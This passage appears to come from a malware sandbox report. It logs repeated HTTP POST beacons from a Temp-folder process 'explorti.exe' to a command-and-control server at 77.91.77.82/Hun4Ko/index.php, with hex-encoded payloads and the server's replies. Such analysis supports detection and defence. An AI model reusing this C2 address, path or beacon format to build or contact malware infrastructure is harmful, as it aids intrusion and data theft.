                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:07.129904032 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.4 | 49741 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:07.239581108 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:07.978058100 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:07.978868008 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:08.212229013 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.4 | 49742 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:08.332653999 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:09.050707102 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:09.055381060 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:09.282841921 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.4 | 49743 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:09.394258976 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:10.092967033 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:10.094006062 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:10.310858011 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.4 | 49744 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:10.425515890 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:11.117185116 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:11.119334936 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:11.337167025 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    8 | 192.168.2.4 | 49745 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:11.458595991 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:12.202783108 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:12.203501940 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:12.433974981 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    9 | 192.168.2.4 | 49746 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:12.550483942 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:13.255688906 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:13.256418943 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:13.475923061 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    10 | 192.168.2.4 | 49747 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:13.598210096 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:14.309160948 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:14.310110092 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:14.533269882 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    11 | 192.168.2.4 | 49748 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:14.644329071 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:16.303675890 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:16.303908110 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:16.304158926 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:16.304296017 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:16.305944920 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:16.527744055 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    12 | 192.168.2.4 | 49749 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:16.648510933 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:17.363126040 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:17.365453959 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:17.594145060 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    13 | 192.168.2.4 | 49750 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:17.706784010 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:18.398535967 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:18.399399042 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:18.616611958 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    14 | 192.168.2.4 | 49751 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:18.737929106 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:19.432054043 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:19.432748079 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
